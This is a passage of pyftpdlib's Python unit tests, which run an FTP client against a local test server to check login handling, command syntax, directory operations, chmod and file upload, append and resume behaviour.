"name": "Ruby",
"bytes": "4277"
},
{
"name": "Shell",
"bytes": "22561"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
}
|
import contextlib
import errno
import ftplib
import logging
import os
import random
import re
import select
import shutil
import socket
import stat
import sys
import tempfile
import time
import warnings
import mock
from pyftpdlib._compat import b
from pyftpdlib._compat import PY3
from pyftpdlib._compat import u
from pyftpdlib._compat import unicode
from pyftpdlib.filesystems import AbstractedFS
from pyftpdlib.handlers import DTPHandler
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.handlers import SUPPORTS_HYBRID_IPV6
from pyftpdlib.handlers import ThrottledDTPHandler
from pyftpdlib.ioloop import IOLoop
from pyftpdlib.servers import FTPServer
from pyftpdlib.test import BUFSIZE
from pyftpdlib.test import configure_logging
from pyftpdlib.test import disable_log_warning
from pyftpdlib.test import FTPd
from pyftpdlib.test import HOME
from pyftpdlib.test import HOST
from pyftpdlib.test import INTERRUPTED_TRANSF_SIZE
from pyftpdlib.test import OSX
from pyftpdlib.test import PASSWD
from pyftpdlib.test import POSIX
from pyftpdlib.test import remove_test_files
from pyftpdlib.test import retry_before_failing
from pyftpdlib.test import safe_mkdir
from pyftpdlib.test import safe_remove
from pyftpdlib.test import safe_rmdir
from pyftpdlib.test import SUPPORTS_IPV4
from pyftpdlib.test import SUPPORTS_IPV6
from pyftpdlib.test import SUPPORTS_SENDFILE
from pyftpdlib.test import TESTFN
from pyftpdlib.test import TESTFN_UNICODE
from pyftpdlib.test import TESTFN_UNICODE_2
from pyftpdlib.test import TIMEOUT
from pyftpdlib.test import touch
from pyftpdlib.test import TRAVIS
from pyftpdlib.test import USER
from pyftpdlib.test import VERBOSITY
from pyftpdlib.test import WINDOWS
import pyftpdlib.__main__
try:
from StringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
try:
import ssl
except ImportError:
ssl = None
if sys.version_info < (2, 7):
import unittest2 as unittest # pip install unittest2
else:
import unittest
if not hasattr(unittest.TestCase, "assertRaisesRegex"):
unittest.TestCase.assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
sendfile = None
if POSIX:
try:
import sendfile
except ImportError:
pass
class TestFtpAuthentication(unittest.TestCase):
"test: USER, PASS, REIN."
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.handler.auth_failed_timeout = 0.001
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.file = open(TESTFN, 'w+b')
self.dummyfile = BytesIO()
def tearDown(self):
self.server.handler.auth_failed_timeout = 5
self.client.close()
self.server.stop()
if not self.file.closed:
self.file.close()
if not self.dummyfile.closed:
self.dummyfile.close()
os.remove(TESTFN)
def assert_auth_failed(self, user, passwd):
self.assertRaisesRegex(ftplib.error_perm, '530 Authentication failed',
self.client.login, user, passwd)
def test_auth_ok(self):
self.client.login(user=USER, passwd=PASSWD)
def test_anon_auth(self):
self.client.login(user='anonymous', passwd='anon@')
self.client.login(user='anonymous', passwd='')
# supposed to be case sensitive
self.assert_auth_failed('AnoNymouS', 'foo')
# empty passwords should be allowed
self.client.sendcmd('user anonymous')
self.client.sendcmd('pass ')
self.client.sendcmd('user anonymous')
self.client.sendcmd('pass')
def test_auth_failed(self):
self.assert_auth_failed(USER, 'wrong')
self.assert_auth_failed('wrong', PASSWD)
self.assert_auth_failed('wrong', 'wrong')
def test_wrong_cmds_order(self):
self.assertRaisesRegex(ftplib.error_perm, '503 Login with USER first',
self.client.sendcmd, 'pass ' + PASSWD)
self.client.login(user=USER, passwd=PASSWD)
self.assertRaisesRegex(ftplib.error_perm,
"503 User already authenticated.",
self.client.sendcmd, 'pass ' + PASSWD)
def test_max_auth(self):
self.assert_auth_failed(USER, 'wrong')
self.assert_auth_failed(USER, 'wrong')
self.assert_auth_failed(USER, 'wrong')
        # If authentication fails 3 times the ftpd disconnects the
        # client. We can check if that happens by using self.client.sendcmd()
        # on the 'dead' socket object. If the socket object is really
        # closed, a socket.error exception should be raised (Windows)
        # or an EOFError exception (Linux).
self.client.sock.settimeout(.1)
self.assertRaises((socket.error, EOFError), self.client.sendcmd, '')
def test_rein(self):
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('rein')
# user not authenticated, error response expected
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'pwd')
# by logging-in again we should be able to execute a
# file-system command
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('pwd')
@retry_before_failing()
def test_rein_during_transfer(self):
# Test REIN while already authenticated and a transfer is
# in progress.
self.client.login(user=USER, passwd=PASSWD)
data = b'abcde12345' * 1000000
self.file.write(data)
self.file.close()
conn = self.client.transfercmd('retr ' + TESTFN)
self.addCleanup(conn.close)
rein_sent = False
bytes_recv = 0
while 1:
chunk = conn.recv(BUFSIZE)
if not chunk:
break
bytes_recv += len(chunk)
self.dummyfile.write(chunk)
if bytes_recv > INTERRUPTED_TRANSF_SIZE and not rein_sent:
rein_sent = True
# flush account, error response expected
self.client.sendcmd('rein')
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.dir)
        # a 226 response is expected once transfer finishes
self.assertEqual(self.client.voidresp()[:3], '226')
# account is still flushed, error response is still expected
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'size ' + TESTFN)
# by logging-in again we should be able to execute a
# filesystem command
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('pwd')
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
def test_user(self):
# Test USER while already authenticated and no transfer
# is in progress.
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('user ' + USER) # authentication flushed
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'pwd')
self.client.sendcmd('pass ' + PASSWD)
self.client.sendcmd('pwd')
def test_user_during_transfer(self):
# Test USER while already authenticated and a transfer is
# in progress.
self.client.login(user=USER, passwd=PASSWD)
data = b'abcde12345' * 1000000
self.file.write(data)
self.file.close()
conn = self.client.transfercmd('retr ' + TESTFN)
self.addCleanup(conn.close)
        rein_sent = False
bytes_recv = 0
while 1:
chunk = conn.recv(BUFSIZE)
if not chunk:
break
bytes_recv += len(chunk)
self.dummyfile.write(chunk)
# stop transfer while it isn't finished yet
if bytes_recv > INTERRUPTED_TRANSF_SIZE and not rein_sent:
rein_sent = True
# flush account, expect an error response
self.client.sendcmd('user ' + USER)
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.dir)
# a 226 response is expected once transfer finishes
self.assertEqual(self.client.voidresp()[:3], '226')
# account is still flushed, error response is still expected
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'pwd')
# by logging-in again we should be able to execute a
# filesystem command
self.client.sendcmd('pass ' + PASSWD)
self.client.sendcmd('pwd')
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
class TestFtpDummyCmds(unittest.TestCase):
"test: TYPE, STRU, MODE, NOOP, SYST, ALLO, HELP, SITE HELP"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
self.server.stop()
def test_type(self):
self.client.sendcmd('type a')
self.client.sendcmd('type i')
self.client.sendcmd('type l7')
self.client.sendcmd('type l8')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'type ?!?')
def test_stru(self):
self.client.sendcmd('stru f')
self.client.sendcmd('stru F')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'stru p')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'stru r')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'stru ?!?')
def test_mode(self):
self.client.sendcmd('mode s')
self.client.sendcmd('mode S')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'mode b')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'mode c')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'mode ?!?')
def test_noop(self):
self.client.sendcmd('noop')
def test_syst(self):
self.client.sendcmd('syst')
def test_allo(self):
self.client.sendcmd('allo x')
def test_quit(self):
self.client.sendcmd('quit')
def test_help(self):
self.client.sendcmd('help')
cmd = random.choice(list(FTPHandler.proto_cmds.keys()))
self.client.sendcmd('help %s' % cmd)
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'help ?!?')
def test_site(self):
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'site')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'site ?!?')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site foo bar')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'sitefoo bar')
def test_site_help(self):
self.client.sendcmd('site help')
self.client.sendcmd('site help help')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site help ?!?')
def test_rest(self):
# Test error conditions only; resumed data transfers are
# tested later.
self.client.sendcmd('type i')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest str')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest -1')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest 10.1')
# REST is not supposed to be allowed in ASCII mode
self.client.sendcmd('type a')
self.assertRaisesRegex(ftplib.error_perm, 'not allowed in ASCII mode',
self.client.sendcmd, 'rest 10')
def test_feat(self):
resp = self.client.sendcmd('feat')
self.assertTrue('UTF8' in resp)
self.assertTrue('TVFS' in resp)
def test_opts_feat(self):
self.assertRaises(
ftplib.error_perm, self.client.sendcmd, 'opts mlst bad_fact')
self.assertRaises(
ftplib.error_perm, self.client.sendcmd, 'opts mlst type ;')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'opts not_mlst')
        # utility function used for extracting the MLST "facts"
        # string from the FEAT response
def mlst():
resp = self.client.sendcmd('feat')
return re.search(r'^\s*MLST\s+(\S+)$', resp, re.MULTILINE).group(1)
# we rely on "type", "perm", "size", and "modify" facts which
# are those available on all platforms
self.assertTrue('type*;perm*;size*;modify*;' in mlst())
self.assertEqual(self.client.sendcmd(
'opts mlst type;'), '200 MLST OPTS type;')
self.assertEqual(self.client.sendcmd(
'opts mLSt TypE;'), '200 MLST OPTS type;')
self.assertTrue('type*;perm;size;modify;' in mlst())
self.assertEqual(self.client.sendcmd('opts mlst'), '200 MLST OPTS ')
self.assertTrue('*' not in mlst())
self.assertEqual(
self.client.sendcmd('opts mlst fish;cakes;'), '200 MLST OPTS ')
self.assertTrue('*' not in mlst())
self.assertEqual(self.client.sendcmd('opts mlst fish;cakes;type;'),
'200 MLST OPTS type;')
self.assertTrue('type*;perm;size;modify;' in mlst())
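        # Note (added for clarity): per RFC 3659, a trailing '*' after a
        # fact name in the FEAT listing (e.g. 'type*;perm;...') marks that
        # fact as currently selected for MLST/MLSD responses, which is what
        # the assertions above toggle via 'OPTS MLST'.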
class TestFtpCmdsSemantic(unittest.TestCase):
server_class = FTPd
client_class = ftplib.FTP
arg_cmds = ['allo', 'appe', 'dele', 'eprt', 'mdtm', 'mode', 'mkd', 'opts',
'port', 'rest', 'retr', 'rmd', 'rnfr', 'rnto', 'site', 'size',
'stor', 'stru', 'type', 'user', 'xmkd', 'xrmd', 'site chmod']
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
self.server.stop()
def test_arg_cmds(self):
# Test commands requiring an argument.
expected = "501 Syntax error: command needs an argument."
for cmd in self.arg_cmds:
self.client.putcmd(cmd)
resp = self.client.getmultiline()
self.assertEqual(resp, expected)
def test_no_arg_cmds(self):
# Test commands accepting no arguments.
expected = "501 Syntax error: command does not accept arguments."
narg_cmds = ['abor', 'cdup', 'feat', 'noop', 'pasv', 'pwd', 'quit',
'rein', 'syst', 'xcup', 'xpwd']
for cmd in narg_cmds:
self.client.putcmd(cmd + ' arg')
resp = self.client.getmultiline()
self.assertEqual(resp, expected)
def test_auth_cmds(self):
# Test those commands requiring client to be authenticated.
expected = "530 Log in with USER and PASS first."
self.client.sendcmd('rein')
for cmd in self.server.handler.proto_cmds:
cmd = cmd.lower()
if cmd in ('feat', 'help', 'noop', 'user', 'pass', 'stat', 'syst',
'quit', 'site', 'site help', 'pbsz', 'auth', 'prot',
'ccc'):
continue
if cmd in self.arg_cmds:
cmd = cmd + ' arg'
self.client.putcmd(cmd)
resp = self.client.getmultiline()
self.assertEqual(resp, expected)
def test_no_auth_cmds(self):
# Test those commands that do not require client to be authenticated.
self.client.sendcmd('rein')
for cmd in ('feat', 'help', 'noop', 'stat', 'syst', 'site help'):
self.client.sendcmd(cmd)
# STAT provided with an argument is equal to LIST hence not allowed
# if not authenticated
self.assertRaisesRegex(ftplib.error_perm, '530 Log in with USER',
self.client.sendcmd, 'stat /')
self.client.sendcmd('quit')
class TestFtpFsOperations(unittest.TestCase):
"test: PWD, CWD, CDUP, SIZE, RNFR, RNTO, DELE, MKD, RMD, MDTM, STAT"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.tempfile = os.path.basename(touch(TESTFN))
self.tempdir = os.path.basename(tempfile.mkdtemp(dir=HOME))
def tearDown(self):
self.client.close()
self.server.stop()
safe_remove(self.tempfile)
if os.path.exists(self.tempdir):
shutil.rmtree(self.tempdir)
def test_cwd(self):
self.client.cwd(self.tempdir)
self.assertEqual(self.client.pwd(), '/' + self.tempdir)
self.assertRaises(ftplib.error_perm, self.client.cwd, 'subtempdir')
# cwd provided with no arguments is supposed to move us to the
# root directory
self.client.sendcmd('cwd')
self.assertEqual(self.client.pwd(), u('/'))
def test_pwd(self):
self.assertEqual(self.client.pwd(), u('/'))
self.client.cwd(self.tempdir)
self.assertEqual(self.client.pwd(), '/' + self.tempdir)
def test_cdup(self):
subfolder = os.path.basename(tempfile.mkdtemp(dir=self.tempdir))
self.assertEqual(self.client.pwd(), u('/'))
self.client.cwd(self.tempdir)
self.assertEqual(self.client.pwd(), '/%s' % self.tempdir)
self.client.cwd(subfolder)
self.assertEqual(self.client.pwd(),
'/%s/%s' % (self.tempdir, subfolder))
self.client.sendcmd('cdup')
self.assertEqual(self.client.pwd(), '/%s' % self.tempdir)
self.client.sendcmd('cdup')
self.assertEqual(self.client.pwd(), u('/'))
# make sure we can't escape from root directory
self.client.sendcmd('cdup')
self.assertEqual(self.client.pwd(), u('/'))
def test_mkd(self):
tempdir = os.path.basename(tempfile.mktemp(dir=HOME))
dirname = self.client.mkd(tempdir)
# the 257 response is supposed to include the absolute dirname
self.assertEqual(dirname, '/' + tempdir)
# make sure we can't create directories which already exist
# (probably not really necessary);
        # let's use a try/except statement to avoid leaving behind
        # an orphaned temporary directory in the event of a test failure.
try:
self.client.mkd(tempdir)
except ftplib.error_perm:
os.rmdir(tempdir) # ok
else:
self.fail('ftplib.error_perm not raised.')
def test_rmd(self):
self.client.rmd(self.tempdir)
self.assertRaises(ftplib.error_perm, self.client.rmd, self.tempfile)
# make sure we can't remove the root directory
self.assertRaisesRegex(ftplib.error_perm,
"Can't remove root directory",
self.client.rmd, u('/'))
def test_dele(self):
self.client.delete(self.tempfile)
self.assertRaises(ftplib.error_perm, self.client.delete, self.tempdir)
def test_rnfr_rnto(self):
# rename file
tempname = os.path.basename(tempfile.mktemp(dir=HOME))
self.client.rename(self.tempfile, tempname)
self.client.rename(tempname, self.tempfile)
# rename dir
tempname = os.path.basename(tempfile.mktemp(dir=HOME))
self.client.rename(self.tempdir, tempname)
self.client.rename(tempname, self.tempdir)
# rnfr/rnto over non-existing paths
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.rename, bogus, '/x')
self.assertRaises(
ftplib.error_perm, self.client.rename, self.tempfile, u('/'))
# rnto sent without first specifying the source
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'rnto ' + self.tempfile)
# make sure we can't rename root directory
self.assertRaisesRegex(ftplib.error_perm,
"Can't rename home directory",
self.client.rename, '/', '/x')
def test_mdtm(self):
self.client.sendcmd('mdtm ' + self.tempfile)
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'mdtm ' + bogus)
# make sure we can't use mdtm against directories
try:
self.client.sendcmd('mdtm ' + self.tempdir)
except ftplib.error_perm as err:
self.assertTrue("not retrievable" in str(err))
else:
self.fail('Exception not raised')
def test_unforeseen_mdtm_event(self):
        # Emulate a case where the file last modification time is prior
        # to year 1900. This most likely will never happen unless
        # someone specifically forces the last modification time of a
        # file in some way.
        # To do so we temporarily override os.path.getmtime so that it
        # returns a negative value referring to a year prior to 1900.
        # It causes time.localtime/gmtime to raise a ValueError exception
        # which is supposed to be handled by the server.
        # On Python 3 it seems that the trick of replacing the original
        # method with the lambda doesn't work.
if not PY3:
_getmtime = AbstractedFS.getmtime
try:
AbstractedFS.getmtime = lambda x, y: -9000000000
self.assertRaisesRegex(
ftplib.error_perm,
"550 Can't determine file's last modification time",
self.client.sendcmd, 'mdtm ' + self.tempfile)
# make sure client hasn't been disconnected
self.client.sendcmd('noop')
finally:
AbstractedFS.getmtime = _getmtime
def test_size(self):
self.client.sendcmd('type a')
self.assertRaises(ftplib.error_perm, self.client.size, self.tempfile)
self.client.sendcmd('type i')
self.client.size(self.tempfile)
# make sure we can't use size against directories
try:
self.client.sendcmd('size ' + self.tempdir)
except ftplib.error_perm as err:
self.assertTrue("not retrievable" in str(err))
else:
self.fail('Exception not raised')
if not hasattr(os, 'chmod'):
def test_site_chmod(self):
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod 777 ' + self.tempfile)
else:
def test_site_chmod(self):
# not enough args
self.assertRaises(ftplib.error_perm,
self.client.sendcmd, 'site chmod 777')
# bad args
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod -177 ' + self.tempfile)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod 778 ' + self.tempfile)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod foo ' + self.tempfile)
def getmode():
mode = oct(stat.S_IMODE(os.stat(self.tempfile).st_mode))
if PY3:
mode = mode.replace('o', '')
return mode
# on Windows it is possible to set read-only flag only
if WINDOWS:
self.client.sendcmd('site chmod 777 ' + self.tempfile)
self.assertEqual(getmode(), '0666')
self.client.sendcmd('site chmod 444 ' + self.tempfile)
self.assertEqual(getmode(), '0444')
self.client.sendcmd('site chmod 666 ' + self.tempfile)
self.assertEqual(getmode(), '0666')
else:
self.client.sendcmd('site chmod 777 ' + self.tempfile)
self.assertEqual(getmode(), '0777')
self.client.sendcmd('site chmod 755 ' + self.tempfile)
self.assertEqual(getmode(), '0755')
self.client.sendcmd('site chmod 555 ' + self.tempfile)
self.assertEqual(getmode(), '0555')
class TestFtpStoreData(unittest.TestCase):
"""Test STOR, STOU, APPE, REST, TYPE."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.dummy_recvfile = BytesIO()
self.dummy_sendfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.stop()
self.dummy_recvfile.close()
self.dummy_sendfile.close()
safe_remove(TESTFN)
def test_stor(self):
try:
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_stor_active(self):
# Like test_stor but using PORT
self.client.set_pasv(False)
self.test_stor()
def test_stor_ascii(self):
# Test STOR in ASCII mode
def store(cmd, fp, blocksize=8192):
# like storbinary() except it sends "type a" instead of
# "type i" before starting the transfer
self.client.voidcmd('type a')
with contextlib.closing(self.client.transfercmd(cmd)) as conn:
while 1:
buf = fp.read(blocksize)
if not buf:
break
conn.sendall(buf)
return self.client.voidresp()
try:
data = b'abcde12345\r\n' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
store('stor ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
expected = data.replace(b'\r\n', b(os.linesep))
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(expected), len(datafile))
self.assertEqual(hash(expected), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_stor_ascii_2(self):
        # Test that no extra carriage returns are added to the
# file in ASCII mode in case CRLF gets truncated in two chunks
# (issue 116)
def store(cmd, fp, blocksize=8192):
# like storbinary() except it sends "type a" instead of
# "type i" before starting the transfer
self.client.voidcmd('type a')
with contextlib.closing(self.client.transfercmd(cmd)) as conn:
while 1:
buf = fp.read(blocksize)
if not buf:
break
conn.sendall(buf)
return self.client.voidresp()
old_buffer = DTPHandler.ac_in_buffer_size
try:
# set a small buffer so that CRLF gets delivered in two
# separate chunks: "CRLF", " f", "oo", " CR", "LF", " b", "ar"
DTPHandler.ac_in_buffer_size = 2
data = b'\r\n foo \r\n bar'
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
store('stor ' + TESTFN, self.dummy_sendfile)
expected = data.replace(b'\r\n', b(os.linesep))
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
self.assertEqual(expected, self.dummy_recvfile.read())
finally:
DTPHandler.ac_in_buffer_size = old_buffer
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
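    # Note (added for clarity): shrinking DTPHandler.ac_in_buffer_size to 2
    # in the test above forces the CRLF sequence to arrive split across
    # separate recv() calls, the exact condition behind the duplicated
    # carriage returns reported in issue 116.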
def test_stou(self):
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.voidcmd('TYPE I')
# filename comes in as "1xx FILE: <filename>"
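        # (RFC-1123, par. 4.1.2.9, recommends the "FILE: pppp" form for
        # STOU replies)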
filename = self.client.sendcmd('stou').split('FILE: ')[1]
try:
with contextlib.closing(self.client.makeport()) as sock:
conn, sockaddr = sock.accept()
with contextlib.closing(conn):
conn.settimeout(TIMEOUT)
if hasattr(self.client_class, 'ssl_version'):
conn = ssl.wrap_socket(conn)
while 1:
buf = self.dummy_sendfile.read(8192)
if not buf:
break
conn.sendall(buf)
# transfer finished, a 226 response is expected
self.assertEqual('226', self.client.voidresp()[:3])
self.client.retrbinary('retr ' + filename,
self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(filename):
try:
self.client.delete(filename)
except (ftplib.Error, EOFError, socket.error):
safe_remove(filename)
def test_stou_rest(self):
# Watch for STOU preceded by REST, which makes no sense.
self.client.sendcmd('type i')
self.client.sendcmd('rest 10')
self.assertRaisesRegex(ftplib.error_temp, "Can't STOU while REST",
self.client.sendcmd, 'stou')
def test_stou_orphaned_file(self):
# Check that no orphaned file gets left behind when STOU fails.
# Even if STOU fails the file is first created and then erased.
        # Since we can't know the name of the file, the best way to
        # test this case is to compare the contents of the directory
        # before and after STOU has been issued.
# Assuming that TESTFN is supposed to be a "reserved" file
# name we shouldn't get false positives.
safe_remove(TESTFN)
# login as a limited user in order to make STOU fail
self.client.login('anonymous', '@nopasswd')
before = os.listdir(HOME)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stou ' + TESTFN)
after = os.listdir(HOME)
if before != after:
for file in after:
self.assertFalse(file.startswith(TESTFN))
def test_appe(self):
try:
data1 = b'abcde12345' * 100000
self.dummy_sendfile.write(data1)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
data2 = b'fghil67890' * 100000
self.dummy_sendfile.write(data2)
self.dummy_sendfile.seek(len(data1))
self.client.storbinary('appe ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary("retr " + TESTFN, self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data1 + data2), len(datafile))
self.assertEqual(hash(data1 + data2), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_appe_rest(self):
# Watch for APPE preceded by REST, which makes no sense.
self.client.sendcmd('type i')
self.client.sendcmd('rest 10')
self.assertRaisesRegex(ftplib.error_temp, "Can't APPE while REST",
self.client.sendcmd, 'appe x')
def test_rest_on_stor(self):
# Test STOR preceded by REST.
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.voidcmd('TYPE I')
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as conn:
bytes_sent = 0
while 1:
chunk = self.dummy_sendfile.read(BUFSIZE)
conn.sendall(chunk)
bytes_sent += len(chunk)
# stop transfer while it isn't finished yet
if bytes_sent >= INTERRUPTED_TRANSF_SIZE or not chunk:
break
        # the transfer wasn't finished yet but the server can't know
        # this, hence expect a 226 response
self.assertEqual('226', self.client.voidresp()[:3])
# resuming transfer by using a marker value greater than the
# file size stored on the server should result in an error
# on stor
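        # (REST sets a byte-offset marker; the following STOR/RETR is
        # supposed to resume the transfer from that offset, RFC-3659)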
file_size = self.client.size(TESTFN)
self.assertEqual(file_size, bytes_sent)
self.client.sendcmd('rest %s' % ((file_size + 1)))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stor ' + TESTFN)
self.client.sendcmd('rest %s' % bytes_sent)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
self.dummy_sendfile.seek(0)
self.dummy_recvfile.seek(0)
data_sendfile = self.dummy_sendfile.read()
data_recvfile = self.dummy_recvfile.read()
self.assertEqual(len(data_sendfile), len(data_recvfile))
        self.assertEqual(hash(data_sendfile), hash(data_recvfile))
self.client.delete(TESTFN)
def test_failing_rest_on_stor(self):
# Test REST -> STOR against a non existing file.
if os.path.exists(TESTFN):
self.client.delete(TESTFN)
self.client.sendcmd('type i')
self.client.sendcmd('rest 10')
self.assertRaises(ftplib.error_perm, self.client.storbinary,
'stor ' + TESTFN, lambda x: x)
        # if the first STOR failed because of REST, the REST marker
        # is supposed to be reset to 0
self.dummy_sendfile.write(b'x' * 4096)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
def test_quit_during_transfer(self):
        # RFC-959 states that if QUIT is sent while a transfer is in
        # progress, the connection must remain open until the result
        # response has been sent, after which the server closes it.
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as conn:
conn.sendall(b'abcde12345' * 50000)
self.client.sendcmd('quit')
conn.sendall(b'abcde12345' * 50000)
# expect the response (transfer ok)
self.assertEqual('226', self.client.voidresp()[:3])
# Make sure client has been disconnected.
# socket.error (Windows) or EOFError (Linux) exception is supposed
# to be raised in such a case.
self.client.sock.settimeout(.1)
self.assertRaises((socket.error, EOFError),
self.client.sendcmd, 'noop')
def test_stor_empty_file(self):
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
self.client.quit()
with open(TESTFN) as f:
self.assertEqual(f.read(), "")
@unittest.skipUnless(POSIX, "POSIX only")
@unittest.skipIf(sys.version_info < (3, 3) and sendfile is None,
"pysendfile not installed")
class TestFtpStoreDataNoSendfile(TestFtpStoreData):
"""Test STOR, STOU, APPE, REST, TYPE not using sendfile()."""
def setUp(self):
TestFtpStoreData.setUp(self)
self.server.handler.use_sendfile = False
def tearDown(self):
TestFtpStoreData.tearDown(self)
self.server.handler.use_sendfile = True
@unittest.skipUnless(POSIX, "POSIX only")
@unittest.skipIf(sys.version_info < (3, 3) and sendfile is None,
"pysendfile not installed")
class TestSendfile(unittest.TestCase):
"""Sendfile specific tests."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
